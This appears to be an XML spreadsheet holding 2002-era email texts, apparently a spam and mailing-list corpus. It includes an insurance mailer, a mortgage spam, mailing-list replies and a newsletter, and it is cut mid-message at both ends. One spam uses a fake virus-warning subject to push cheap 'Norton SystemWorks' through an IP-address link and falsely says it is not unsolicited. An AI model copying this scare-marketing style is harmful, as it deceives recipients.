 increasing sales&lt;/b&gt;=20
                         with our generic PowerPoint&amp;reg; EIA =
 presentation, and=20
                         "Should I Stay or Should I Go," Incomizer=20
                         and Inflationizer sales ideas.&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td valign=3D"top"&gt;&lt;img =
 src=3D"http://iiq.us/images/amfin/20020823-4.gif" width=3D"16" =
 height=3D"16"&gt;&lt;/td&gt;
                       &lt;td&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Real world scenarios that =
 you can=20
                         use to solve real world problems in today's =
 environment.&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/amfin/20020823-5.gif" alt=3D"The bottom =
 line:&amp;#10;Your senior clients and prospects want you to call us today." =
 width=3D"540" height=3D"59"&gt;&lt;br&gt;
                   &lt;img =
 src=3D"http://iiq.us/images/amfin/20020823-99.gif" width=3D"8" =
 height=3D"8"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td align=3D"center"&gt;=20
                   &lt;b&gt;&lt;font size=3D"2"&gt;Call us today for more =
 information!&lt;br&gt;
                     &lt;img =
 src=3D"http://iiq.us/images/amfin/20020823-6.gif" alt=3D"800-880-3072" =
 width=3D"529" height=3D"90"&gt;&lt;br&gt;
                     - or -&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
                   &lt;table width=3D"95%" border=3D"1" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000"&gt;
                     &lt;tr&gt;=20
                       &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                         &lt;td&gt;=20
                           &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2" align=3D"center" =
 bgcolor=3D"#cccccc"&gt;
                             &lt;tr&gt;=20
                               &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#000066"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"2"&gt;Please fill =
 out the form below for more information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                             &lt;/tr&gt;
                             &lt;tr&gt;=20
                               &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                               &lt;td colspan=3D"3"&gt;&lt;input type=3D"text" =
 name=3D"contactname" size=3D"50"&gt;&lt;/td&gt;
                               &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q3.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                             &lt;/tr&gt;
                             &lt;tr&gt;=20
                               &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                               &lt;td colspan=3D"3"&gt;&lt;input type=3D"text" =
 name=3D"email" size=3D"50"&gt;&lt;/td&gt;
                             &lt;/tr&gt;
                             &lt;tr&gt;=20
                               &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                               &lt;td colspan=3D"3"&gt;&lt;input type=3D"text" =
 name=3D"phone" size=3D"50"&gt;&lt;/td&gt;
                             &lt;/tr&gt;
                             &lt;tr&gt;=20
                               &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                               &lt;td width=3D"30%"&gt;&lt;input type=3D"text" =
 name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                               &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                               &lt;td width=3D"20%"&gt;&lt;input type=3D"text" =
 name=3D"state" size=3D"2"&gt;&lt;/td&gt;
                             &lt;/tr&gt;
                             &lt;tr&gt;=20
                               &lt;td width=3D"15%" =
 align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                               &lt;td width=3D"30%" colspan=3D'3'&gt;=20
                                 &lt;input type=3D"submit" =
 name=3D"btnsubmit" value=3D"Submit"&gt;
                                 &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"brianb@americanfinancialbrkg.com"&gt;
                                 &lt;input type=3D"hidden" =
 name=3D"hdnSubjectTxt" value=3D"AFM Ad Inquiry"&gt;
                               &lt;/td&gt;
                             &lt;/tr&gt;
                           &lt;/table&gt;
                         &lt;/td&gt;
                       &lt;input type=3D'hidden' name=3D'SentTo' =
 value=3D'304704'&gt;
 &lt;/form&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;&lt;br&gt;
                   &lt;img src=3D"http://iiq.us/images/amfin/20020823-7.gif" =
 alt=3D"American Financial Marketing, Inc." width=3D"400" height=3D"160"&gt;
 								&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
 					&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
 		&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#cccccc" align=3D"center"&gt;
 			&lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;We don't =
 want anyone to receive our mailings who does not=20
 			wish to receive them. This is a professional communication=20
 			sent to insurance professionals. To be removed from this mailing=20
 			list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; to this message. Instead, go here: &lt;a =
 href=3D"http://www.insuranceiq.com/optout/"&gt;=20
 			http://www.insuranceiq.com/optout&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;a href=3D"http://www.insiq.com/legal.htm"&gt;&lt;font size=3D"1" =
 face=3D"Arial, Helvetica, sans-serif"&gt;Legal Notice &lt;/font&gt;&lt;/a&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;=20
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_2505E5_01C254FA.FC480250--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [IIU] spyware calling home?
</t>
  </si>
  <si>
    <t xml:space="preserve">Ad Aware sometimes helps too.
 -R
 On Saturday, August 3, 2002, at 10:39  pm, Brian O'Brien wrote:
 &gt; Thanks, Martin, iwill try that, however i've only approved the minimal
 &gt; standard apps - I'll give it a go anyway. I think this is something more
 &gt; insidious than the standard adprogram - maybe i'm paranoid!!!
 &gt; Brian
 _______________________________________________
 IIU mailing list
 IIU@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: WARNING: Your computer may contain a virus!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Language" content="en-us"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 5.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;title&gt;Take Control of Your Computer With This Top&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table border="0" width="489" height="54" bgcolor="#ffffff"&gt;
   &lt;tr&gt;
     &lt;td width="100%" height="48" bgcolor="#ffffff" align="Center"&gt;
     &lt;font face="Impact" color="#cc0000" size="3"&gt;Take Control of Your Computer 
     With This Top-of-the-Line Software!&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border="5" cellspacing="3" width="489" cellpadding="3" bgcolor="#990033" bordercolor="#ffffff" style="border-collapse: collapse" bordercolordark="#000000" height="567" bordercolorlight="#FFFF99"&gt;
   &lt;tr&gt;
     &lt;td width="467" height="555" bordercolorlight="#FFFFFF" bordercolordark="#FFFF99"&gt;
     &lt;table border="6" width="100%" height="86" bgcolor="#ffff99" bordercolor="#ffffff"&gt;
       &lt;tr&gt;
         &lt;td width="100%" height="80" align="Center"&gt;&lt;b&gt;
         &lt;font color="#ff0000" face="Tahoma" size="6"&gt;Norton SystemWorks 2002
         &lt;/font&gt;&lt;font face="Tahoma" size="5" color="#000000"&gt;Software Suite&lt;/font&gt;&lt;font color="#ff0000" face="Times New Roman" size="6"&gt;&lt;br&gt;
         -&lt;i&gt;Professional Edition&lt;/i&gt;-&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;table border="0" width="100%" height="62"&gt;
       &lt;tr&gt;
         &lt;td width="100%" height="56" align="Center"&gt;&lt;b&gt;
         &lt;font face="Tahoma" color="#ffffff" size="4"&gt;Includes Six - &lt;/font&gt;&lt;i&gt;
         &lt;font face="Tahoma" size="4" color="#ffff99"&gt;Yes 6!&lt;/font&gt;&lt;/i&gt;&lt;font face="Tahoma" color="#ffffff" size="4"&gt; 
         - Feature-Packed Utilities&lt;br&gt;
         ALL for &lt;/font&gt;&lt;font face="Tahoma" size="4" color="#ffff99"&gt;1&lt;/font&gt;&lt;font face="Tahoma" color="#ffffff" size="4"&gt; 
         Special &lt;/font&gt;&lt;font face="Tahoma" size="4" color="#ffff99"&gt;LOW&lt;/font&gt;&lt;font face="Tahoma" color="#ffffff" size="4"&gt; 
         Price of &lt;/font&gt;&lt;font face="Tahoma" size="4" color="#ffff99"&gt;Only 
         $29.99!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;table border="4" width="100%" height="135" bgcolor="#800000" bordercolor="#ffffff"&gt;
       &lt;tr&gt;
         &lt;td width="100%" height="129" bgcolor="#ffff99" bordercolor="#800000"&gt;
         &lt;b&gt;&lt;font face="Tahoma" size="2"&gt;&lt;font color="#000000"&gt;This Software 
         Will:&lt;/font&gt;&lt;font color="#ffffff"&gt;&lt;br&gt;
         &amp;nbsp;&lt;/font&gt;&lt;font color="#ff0000"&gt;- Protect your computer from unwanted and
         &lt;i&gt;hazardous&lt;/i&gt; viruses&lt;br&gt;
         &amp;nbsp;- Help secure your private &amp;amp; valuable information&lt;br&gt;
         &amp;nbsp;- Allow you to transfer files and send e-mails &lt;u&gt;safely&lt;/u&gt;&lt;br&gt;
         &amp;nbsp;- Backup your ALL your data quick and easily&lt;br&gt;
         &amp;nbsp;- Improve your PC's performance w/&lt;i&gt;superior&lt;/i&gt; integral diagnostics!&lt;br&gt;
         &amp;nbsp;- &lt;i&gt;You'll NEVER have to take your PC to the repair shop AGAIN!&lt;/i&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;p&gt;&amp;nbsp; &lt;/p&gt;
     &lt;table border="4" width="100%" height="4" bgcolor="#ffffff" bordercolor="#ffff99"&gt;
       &lt;tr&gt;
         &lt;td width="100%" height="1"&gt;
         &lt;p align="Center"&gt;&lt;b&gt;&lt;font size="5" face="Tahoma"&gt;&lt;font color="#000000"&gt;
         &lt;font color="#ff0000"&gt;6&lt;/font&gt; Feature-Packed Utilities &lt;/font&gt;
         &lt;font color="#000080" size="5"&gt;&lt;br&gt;
         &lt;/font&gt;&lt;u&gt;&lt;font color="#ff0000"&gt;1&lt;/font&gt;&lt;font color="#000000"&gt; Great 
         Price&lt;/font&gt;&lt;/u&gt;&lt;font color="#000000" size="5"&gt; &lt;br&gt;
         A &lt;font color="#ff0000"&gt;$300+&lt;/font&gt; Combined Retail Value &lt;/font&gt;&lt;i&gt;
         &lt;font color="#ff0000"&gt;YOURS&lt;/font&gt;&lt;/i&gt; &lt;font color="#000000"&gt;for Only
         &lt;font color="#ff0000"&gt;$29.99!&lt;/font&gt; &lt;/font&gt;&lt;/font&gt;&lt;font size="6"&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/b&gt;&lt;font face="Tahoma" size="4"&gt;&lt;font color="#000000"&gt;&amp;lt; Price 
         Includes &lt;/font&gt;&lt;font color="#ff0000"&gt;FREE&lt;/font&gt;&lt;font color="#000080"&gt;
         &lt;/font&gt;&lt;font color="#000000"&gt;Shipping**! &amp;gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;p align="Center"&gt;&lt;b&gt;&lt;font face="Arial" size="3" color="#ffffff"&gt;Don't fall 
     prey to destructive viruses or hackers!&lt;br&gt;
     Protect&amp;nbsp; your computer and your valuable information and&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
     &lt;table border="4" width="100%" height="44" bordercolor="#ffff99" bgcolor="#ffff99"&gt;
       &lt;tr&gt;
         &lt;td width="100%" height="38" bgcolor="#ffffff" align="Center"&gt;&lt;b&gt;
         &lt;a style="color: rgb(255,0,0); font-family: Verdana; font-size: 14pt; font-weight: bold" title="ORDER NOW" href="http://168.75.161.77/systemworks46.htm"&gt;
         &lt;font face="Tahoma" size="4" color="#ff0000"&gt;-&amp;gt; CLICK HERE to Order 
         Yours NOW! &amp;lt;-&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;p align="Center"&gt;&lt;b&gt;&lt;font color="#FFFFFF"&gt;** Denotes Free Shipping For 
     US/Canadian Customers Only **&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
     &lt;p align="Center"&gt;&amp;nbsp;&lt;/p&gt;
     &lt;p align="Center"&gt;&amp;nbsp;&lt;/p&gt;
     &lt;p align="center"&gt;&lt;font color="#FFFFFF"&gt;We are strongly against sending 
     unsolicited emails to those who do not wish to receive our special mailings. 
     You have opted in to one or more of our affiliate sites requesting to be 
     notified of any special offers we may run from time to time. We also have 
     attained the services of an independent 3rd party to overlook list 
     management and removal services. This is NOT unsolicited email. If you do 
     not wish to receive further mailings, please &lt;/font&gt;
     &lt;a href="http://168.75.161.51/remove-me.asp"&gt;&lt;font color="#FFFFFF"&gt;CLICK 
     HERE&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt;&amp;nbsp;to be removed from the list. Please 
     accept our apologies if you have been sent this email in error. We honor all 
     removal requests.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 2102pSqQ8-906DHIX6392XDPF7-0l26
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 23 Jul 2002, Joseph S. Barrera III wrote:
 &gt; BTW, guys, I'm *kidding*! I'm actually in a pretty good mood right now.
 &gt; I'm not actually a very hateful person, and I certainly can't think of
 &gt; anyone right now I hate, and certainly not anyone on this list!
 You cannot fool us. We know you inside out.
 P.S. We hate you, too.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Adv: Mortgage Quotes Fast Online, No Cost
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Home Page&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p align="center"&gt;&lt;font color="#000000" face="Arial" size="+0"&gt;&lt;b&gt;&lt;IMG SRC="http://mail4.mortgages101.net/logo.php?id=88&amp;id2=1143953"&gt;&lt;/p&gt;
 &lt;p align="center"&gt;If this promotion has reached you in error and you would prefer not to
 receive marketing messages from us, please send an email to&amp;nbsp; &lt;a
 href="mailto:cease-and-desist@mortgages101.net"&gt;cease-and-desist@mortgages101.net&lt;/a&gt;
 &amp;nbsp; (all one word, no spaces) giving us the email address in question or call
 1-888-748-7751 for further assistance.&lt;/p&gt;
 &lt;p align="center"&gt;&lt;u&gt;Gain access to a&lt;/b&gt;&lt;/font&gt;&lt;font size="+1" color="#000000"
 face="Arial"&gt; &lt;i&gt;&lt;b&gt;Vast Network Of Qualified Lenders at Nationwide Network!&lt;/b&gt;&lt;/i&gt;&lt;/font&gt;&lt;/u&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font color="#000000" face="Arial"&gt;This is a zero-cost service which
 enables you to shop for a mortgage conveniently from your home computer. &amp;nbsp; Our
 nationwide database will give you access to lenders with a variety of loan programs that
 will work for Excellent, Good, Fair or even Poor Credit! &lt;/font&gt;&lt;br&gt;
 &amp;nbsp; &lt;font face="Arial,Helvetica"&gt;&lt;b&gt;&lt;font color="#000000"&gt;We will choose up to 3 mortgage companies
 from our database of&amp;nbsp; registered brokers/lenders.&lt;/font&gt;&lt;/b&gt; &lt;b&gt;&lt;font
 face="Arial,Helvetica"&gt;Each will contact you to offer you their best rate and terms - at
 no charge.&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 &amp;nbsp; &lt;br&gt;
 &amp;nbsp;&lt;/font&gt;&lt;b&gt;&lt;font face="Arial,Helvetica" size="+1" color="#ff0000"&gt;You choose the best
 offer and save - &lt;A HREF="http://mail4.mortgages101.net/point.php?id=88&amp;id2=1143953"&gt; Shop here for your next mortgage with just ONE&lt;/font&gt;&lt;font
 face="Arial,Helvetica"&gt;&lt;font color="#ff0000"&gt;&lt;font size="+1"&gt;&lt;font face="Arial,Helvetica"&gt;&lt;/font&gt;
 CLICK - &lt;/A&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt; &lt;br&gt;
 &amp;nbsp; &lt;br&gt;
 &lt;/font&gt;&lt;font face="Arial,Helvetica" size="+0" color="#000000"&gt;&lt;b&gt;Poor or Damaged Credit Is
 Not A Problem!&lt;/b&gt;&lt;/font&gt;&lt;font face="Arial,Helvetica"&gt; &lt;/p&gt;
 &lt;ul&gt;
   &lt;b&gt;&lt;font size="+0"&gt;&lt;font color="#cc3300"&gt;&lt;p align="center"&gt;Consolidate&lt;/font&gt; &amp;amp; pay
   off &lt;font color="#cc3300"&gt;high interest bills&lt;/font&gt; for one lower monthly payment!&amp;nbsp;&lt;/font&gt;&lt;/b&gt;
   &lt;/p&gt;
   &lt;p align="center"&gt;&lt;b&gt;&lt;font size="+0"&gt;&lt;font color="#cc3300"&gt;Refinance&lt;/font&gt; (with or
   without cash out) to a &lt;font color="#cc3300"&gt;low FIXED rate &lt;/font&gt;and payment!&lt;/font&gt;&lt;/b&gt;
   &lt;/p&gt;
   &lt;p align="center"&gt;&lt;b&gt;&lt;font size="+0"&gt;Get money&lt;font color="#cc3300"&gt; &lt;/font&gt;to cover
   expenses for &lt;font color="#cc3300"&gt;tuitions&lt;/font&gt;, &lt;font color="#cc3300"&gt;home
   improvements&lt;/font&gt;, &lt;font color="#cc3300"&gt;a new vehicle or vacations.&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p align="center"&gt;&lt;b&gt;&lt;font size="+0"&gt;- Talk with up to three of our lenders today!
   &lt;A HREF="http://mail4.mortgages101.net/point.php?id=88&amp;id2=1143953"&gt;   VISIT OUR SITE HERE!   &lt;/A&gt; to get no-cost rate and payment quotes.&amp;nbsp;
   This service is completely FREE to you!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;/ul&gt;
 &lt;b&gt;&lt;i&gt;&lt;font size="+1"&gt;
 &lt;p align="center"&gt;&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/font&gt;
 &lt;p align="center"&gt;&lt;font face="Arial,Helvetica"&gt;If this promotion has reached you in error
 and you do not want to be contacted by us further, &lt;A HREF="http://mail4.mortgages101.net/optout.php?id=88&amp;id2=1143953"&gt;click here&lt;/A&gt; and let us know.&amp;nbsp; You
 will not be bothered by us at this email address again.&amp;nbsp; Alternatively, you may send
 an email to &lt;a href="mailto:cease-and-desist@mortgages101.net"&gt;cease-and-desist@mortgages101.net&lt;/a&gt;
 &amp;nbsp;giving us the email address in question for IMMEDIATE attention.&amp;nbsp; Should you
 wish to delete your email address from our mailing list by phone, please call
 1-888-748-7751 and leave your email address - please spell your email address
 clearly.&amp;nbsp;&amp;nbsp; You may also mail a written request to us at Compliance, NMLN, 3053
 Rancho Vista Blvd. #H-252, Palmdale, CA, 93551.&amp;nbsp; Your request will be honored within
 24 hours of our receipt of your mail.&amp;nbsp; Failure to exclude yourself from our recurring
 mailer via any of the lawful channels provided means that you have given your consent to
 be included in our mailer.&amp;nbsp; You will continue to receive email as long as you do NOT
 delete yourself from our mailer.&amp;nbsp; Please do not continue to receive unwanted email
 after we have provided you with lawful means to be excluded.&amp;nbsp; We log, date and retain
 ALL delete requests.&amp;nbsp; NO PART OF THIS STATEMENT MAY BE AMENDED OR ELIMINATED.&amp;nbsp;
 Thank you.&lt;br&gt;
 &amp;nbsp; &lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On 9/8/02 3:16 PM, "Gary Lawrence Murphy" &lt;garym@canada.com&gt; wrote:
 &gt;&gt;&gt;&gt;&gt;&gt; "J" == James Rogers &lt;jamesr@best.com&gt; writes:
 &gt; 
 &gt;   J&gt; An example: Being able to model RF propagation in three
 &gt;   J&gt; dimensions for a metro area when deploying wireless networks.
 &gt;   J&gt; By having every single tree and building detail and similar,
 &gt;   J&gt; you can "see" even tiny dead spots due to physical blockage and
 &gt;   J&gt; signal attenuation.
 &gt; 
 &gt; Hmmm, just as I thought.  In other words, it has no practical uses
 &gt; whatsoever ;) ... do the biz guys in your office /really/ think WISPs
 &gt; are really going to shell out /their/ money to find a house or two
 &gt; they can't reach?  Experience suggests (a) they won't care and (b)
 &gt; they will even sign up that errant house and then give them a
 &gt; run-around blaming the dead-spot on "unsupported vendor equipment".
 Errrr....the biz guys in my office don't care what the "WISPs" want to do
 with their little WiFi networks.  And the bandwidth shadows in most cities
 are surprisingly large and common.  They aren't selling the software, which
 is pretty pricy as it happens.  They are using it to optimize next
 generation wireless canopies over metro areas and fiber networks on a large
 scale.  There are an essentially infinite number of metro wireless
 configurations, some of which generate far more dead or marginal spots and
 others which are very expensive to operate (due to backhaul transit
 considerations) or both.  This software can be used as a tool to optimize
 the canopy coverage and minimize the actual transit costs since the wireless
 is tied into fiber at multiple points.
 The canopies we are talking about aren't short-range wifi technologies, but
 a mixture of long-range high-performance wireless networking, with bandwidth
 measured in tens to hundreds of mbits and ranges measured in miles (up to
 well over a hundred miles on the extreme end).  At those ranges and
 bandwidth levels, the cost of providing the network can easily vary by an
 order of magnitude or more depending on how you manage RF shadows and
 proximity to fiber access points.  The idea ultimately is to optimize the
 cost and performance such that no existing network infrastructure providers
 can remotely compete and maintain profitability.  This is a surprisingly low
 bar, and it is about time networks were designed with this level of
 large-scale optimization (cost per mbit, maximizing coverage, and effective
 bandwidth available per unit area) in any case.  And for this company's
 long-term plans, this type of capability will be absolutely necessary to
 keep things sane.
 Or at least investors find this capability very sexy and compelling,
 especially since we have this lovely visualization engine tied into the
 system (CLI batches never have the same effect, even if it is more
 efficient).
 -James Rogers
  jamesr@best.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Tech Specialist]  Transportation Rage
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/techspecialist/20020819.html"&gt;
       http://www.lockergnome.com/issues/techspecialist/20020819.html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&lt;/style&gt;&lt;title&gt;20020819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08.19.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;180 MUST-KNOW TECH TERMS&lt;/b&gt; Anyone who's ever been asked to explain a 
 tech term only to be left stumbling through a plausible explanation will 
 appreciate this eBook. From relevant computing personalities, to obscure 
 tech references, to clear descriptions of day-to-day definitions you may 
 already know (but not know how to define). These 180 definitions will leave 
 you talking the talk of the office geek without giving up your entire social 
 calendar to extended sessions in front of a CRT. Even with the refresh rate 
 bumped up to 100Hz. 
 &lt;a href="http://www.gnometomes.com/tome/001104.html"&gt;Download This Tech-Glossary Today&lt;/a&gt;!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 When I was in Omaha a couple of weeks ago, I made the 
 unfortunate mistake of driving through the intersection of 
 90th and Dodge. Those of you in Omaha know what sorts of 
 things I was muttering under my breath during the ordeal. Is 
 it possible to suffer from road rage when you're not moving? 
 Omaha has started a &lt;a 
 href="http://www.ci.omaha.ne.us/streets/restrictdate.asp"&gt;10 
 year project&lt;/a&gt; on Dodge street, which more or less divides 
 the city in half east to west. The traffic tie-ups due to 
 the construction disaster at 90th and Dodge are being felt 
 by nearby businesses. A &lt;a 
 href="http://abclocal.go.com/wpvi/news/81302_bb1.html"&gt;bank 
 is fighting back&lt;/a&gt; in a creative way, replacing random $20 
 and $10 bills in their ATM machine with $50 and $20 notes 
 respectively to reward lucky customers for their patronage. 
 And I just drove right by the place.
 &lt;p&gt;The route to Des Moines from Waterloo isn't much better 
 right now as they widen highway 330/65 to 4 lane between 
 Marshalltown and Des Moines. Once that's done, it will cut 
 20-30 minutes from the trip, and judging from the progress 
 they've been making, it won't be too much longer. That's 
 probably the fastest moving highway construction I've seen 
 during my travels throughout Iowa over the years. As you 
 travel to &lt;a href="http://www.gnomedex.com/"&gt;Gnomedex&lt;/a&gt; 
 from all manner of locales, be sure to keep tabs on 
 construction at &lt;a 
 href="http://www.ctre.iastate.edu/iowaroadwork/"&gt;this handy 
 site&lt;/a&gt; put up by the Iowa Department of Transportation.
 &lt;p align="right"&gt;See You in &lt;a target="_blank" href="http://www.gnomedex.com/"&gt;Des Moines&lt;/a&gt;,&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;font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&lt;b&gt;Microsoft L2TP/IPSec VPN Client&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.microsoft.com/windows2000/server/evaluation/news/bulletins/l2tpclient.asp"&gt;http://www.microsoft.com/windows2000/server/evaluation/news/bulletins/l2tpclient.asp&lt;/a&gt;
 &lt;p&gt;Microsoft L2TP/IPSec VPN Client is a free download that 
 allows computers running Windows 98, Windows Millennium 
 Edition (Me), or Windows NT Workstation 4.0 to use Layer 
 Two Tunneling Protocol (L2TP) connections with Internet 
 Protocol security (IPSec). The combination of L2TP and 
 IPSec, known as L2TP/IPSec, is a highly secure technology 
 for making remote access virtual private network (VPN) 
 connections across public networks such as the Internet. 
 Microsoft L2TP/IPSec VPN Client also provides support for 
 IPSec Network Address Translator (NAT) traversal.
 &lt;!-- GnomeSYSTEM --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSYSTEM&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Iomega Intros 750MB Zip&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.iomega.com/zip"&gt;http://www.iomega.com/zip&lt;/a&gt;
 &lt;p&gt;I've all but ditched Zip drive use entirely due to cost 
 and small capacity. I know many people that still use Zip 
 drives, and I still play with a 1GB Jaz drive from time to 
 time, but with the ease and low cost of CD-RW drives and 
 media, Zip just hasn't stood a chance. Now that Iomega has 
 bumped the capacity to 750MB, employed USB 2.0 and pushed 
 the speed of the drives significantly higher, maybe it's 
 still worth a look for those that need a fast removable 
 media option. I'll stick with CD-RW myself. I'll sacrifice 
 some speed for the reliability of optical media. But that's 
 just me.
 &lt;!-- GnomeALERTZ --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeALERTZ&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Today's Top 5 kbAlertz&lt;/b&gt;
 &lt;p&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q241122"&gt;Q241122 - WINUP- Illegal Operation or Application Error when clicking on Product Updates (Q241122)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q212713"&gt;Q212713 - WD2000: Run-Time Error 5868 Using VBA Macro to Resize Document Window (Q212713)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q212723"&gt;Q212723 - WD2000: Run-Time Error 5841 If Style Doesn't Exist (Q212723)&lt;/a&gt;&lt;/li&gt;
